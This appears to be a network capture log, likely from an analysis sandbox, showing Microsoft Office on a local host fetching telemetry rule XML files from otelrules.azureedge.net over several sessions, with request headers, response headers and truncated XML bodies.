Date: Fri, 29 Nov 2024 22:11:40 GMT
Content-Type: text/xml
Content-Length: 1393
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
ETag: "0x8DC582BE3E55B6E"
x-ms-request-id: 9018dc86-401e-0067-0d2e-4109c2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221140Z-174f7845968glpgnhC1EWR7uec00000010n000000000hhtt
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:40 UTC  1393               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


Session ID  Source IP    Source Port  Destination IP  Destination Port
112         192.168.2.4  49866        13.107.246.63   443
Timestamp                Bytes transferred  Direction  Data
2024-11-29 22:11:40 UTC  192                OUT        GET /rules/rule700201v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:40 UTC  494                IN         HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:40 GMT
Content-Type: text/xml
Content-Length: 1393
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
ETag: "0x8DC582BE39DFC9B"
x-ms-request-id: 2b15fac9-d01e-002b-104f-4125fb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221140Z-174f7845968frfdmhC1EWRxxbw00000010g000000000ghx3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:40 UTC  1393               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


Session ID  Source IP    Source Port  Destination IP  Destination Port
113         192.168.2.4  49867        13.107.246.63   443
Timestamp                Bytes transferred  Direction  Data
2024-11-29 22:11:41 UTC  192                OUT        GET /rules/rule700200v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:41 UTC  494                IN         HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:41 GMT
Content-Type: text/xml
Content-Length: 1356
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF66E42D"
x-ms-request-id: 3d9c3aa7-901e-00ac-5891-3fb69e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221141Z-174f7845968j6t2phC1EWRcfe800000010n000000000gtp3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:41 UTC  1356               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


Session ID  Source IP    Source Port  Destination IP  Destination Port
114         192.168.2.4  49868        13.107.246.63   443
Timestamp                Bytes transferred  Direction  Data
2024-11-29 22:11:41 UTC  192                OUT        GET /rules/rule702351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:41 UTC  494                IN         HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:41 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE017CAD3"
x-ms-request-id: 37388cc4-c01e-00ad-4fef-41a2b9000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221141Z-174f7845968px8v7hC1EWR08ng00000010p000000000qk5b
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:41 UTC  1395               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      115192.168.2.44986913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:42 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:42 UTC495INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:42 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1358
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                      ETag: "0x8DC582BE6431446"
                                                                                                                                      x-ms-request-id: 2191e2ce-a01e-003d-63ab-4298d7000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221142Z-174f7845968n2hr8hC1EWR9cag000000103g00000000h0zs
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:42 UTC | 1358 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      116 | 192.168.2.4 | 49870 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:42 UTC | 192 | OUT | GET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:43 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:42 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1395
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                      ETag: "0x8DC582BDE12A98D"
                                                                                                                                      x-ms-request-id: 9fc3e736-101e-0046-4391-3f91b0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221142Z-174f7845968ljs8phC1EWRe6en00000010bg00000000cqyg
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:43 UTC | 1395 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      117 | 192.168.2.4 | 49871 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:43 UTC | 192 | OUT | GET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:43 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:43 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1358
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                      ETag: "0x8DC582BE022ECC5"
                                                                                                                                      x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221143Z-174f7845968kdththC1EWRzvxn0000000csg00000000nx35
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:43 UTC | 1358 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      118 | 192.168.2.4 | 49872 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:43 UTC | 192 | OUT | GET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:44 UTC | 495 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:43 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1389
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE10A6BC1"
                                                                                                                                      x-ms-request-id: 26f9b3b7-001e-008d-64ab-42d91e000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221143Z-174f7845968cpnpfhC1EWR3afc000000103g00000000fwvc
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:44 UTC | 1389 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      119 | 192.168.2.4 | 49873 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:44 UTC | 192 | OUT | GET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:49 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:49 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1352
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                      ETag: "0x8DC582BE9DEEE28"
                                                                                                                                      x-ms-request-id: ee9d1ea0-001e-00a2-4791-3fd4d5000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221148Z-174f7845968cpnpfhC1EWR3afc000000105g0000000098p1
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:49 UTC | 1352 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      120 | 192.168.2.4 | 49874 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:44 UTC | 192 | OUT | GET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:45 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:45 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1405
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE12B5C71"
                                                                                                                                      x-ms-request-id: fdde8523-d01e-0028-578c-3f7896000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221145Z-174f78459685m244hC1EWRgp2c000000108000000000pc90
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:45 UTC | 1405 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      121 | 192.168.2.4 | 49875 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:45 UTC | 192 | OUT | GET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:45 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:45 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1368
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                      ETag: "0x8DC582BDDC22447"
                                                                                                                                      x-ms-request-id: e3ba4dff-401e-002a-1ea2-42c62e000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221145Z-174f7845968pf68xhC1EWRr4h800000010u0000000007ew7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:45 UTC | 1368 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


Session ID | Source IP | Source Port | Destination IP | Destination Port
122 | 192.168.2.4 | 49865 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:45 UTC | 192 | OUT | GET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:46 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:45 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1356
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                      ETag: "0x8DC582BDC681E17"
                                                                                                                                      x-ms-request-id: af2f76df-f01e-0096-4850-4110ef000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221145Z-174f7845968swgbqhC1EWRmnb400000010tg000000000vpr
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:46 UTC | 1356 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
123 | 192.168.2.4 | 49876 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:45 UTC | 192 | OUT | GET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:46 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:46 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1401
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                      ETag: "0x8DC582BE055B528"
                                                                                                                                      x-ms-request-id: f1905457-c01e-0066-4580-3fa1ec000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221146Z-174f7845968swgbqhC1EWRmnb400000010n000000000feue
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:46 UTC | 1401 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


Session ID | Source IP | Source Port | Destination IP | Destination Port
124 | 192.168.2.4 | 49877 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:47 UTC | 192 | OUT | GET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:47 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:47 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1364
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE1223606"
                                                                                                                                      x-ms-request-id: 2ff5ce10-101e-0017-5791-3f47c7000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221147Z-174f7845968psccphC1EWRuz9s00000010w00000000026p4
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:47 UTC | 1364 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
125 | 192.168.2.4 | 49878 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:47 UTC | 192 | OUT | GET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:48 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:47 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1397
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                      ETag: "0x8DC582BE7262739"
                                                                                                                                      x-ms-request-id: f1763db6-d01e-007a-27fe-41f38c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221147Z-174f7845968xlwnmhC1EWR0sv8000000108g00000000mhay
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:48 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


Session ID | Source IP | Source Port | Destination IP | Destination Port
126 | 192.168.2.4 | 49879 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:48 UTC | 192 | OUT | GET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:48 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:48 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1360
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                      ETag: "0x8DC582BDDEB5124"
                                                                                                                                      x-ms-request-id: b189b901-c01e-0079-3391-3fe51a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221148Z-174f7845968glpgnhC1EWR7uec00000010m000000000n9gh
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:48 UTC | 1360 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
127 | 192.168.2.4 | 49880 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:48 UTC | 192 | OUT | GET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:48 UTC | 515 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:48 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                      ETag: "0x8DC582BDCB4853F"
                                                                                                                                      x-ms-request-id: 0b728e74-b01e-001e-55a2-420214000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221148Z-174f78459684db9fhC1EWRc7g400000000dg000000002x8w
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:48 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      128 | 192.168.2.4 | 49881 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:49 UTC | 192 | OUT | GET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:49 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:49 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                      ETag: "0x8DC582BDB779FC3"
                                                                                                                                      x-ms-request-id: f4671ffc-301e-0000-793a-40eecc000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221149Z-174f7845968qj8jrhC1EWRh41s00000010gg000000006eav
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:49 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


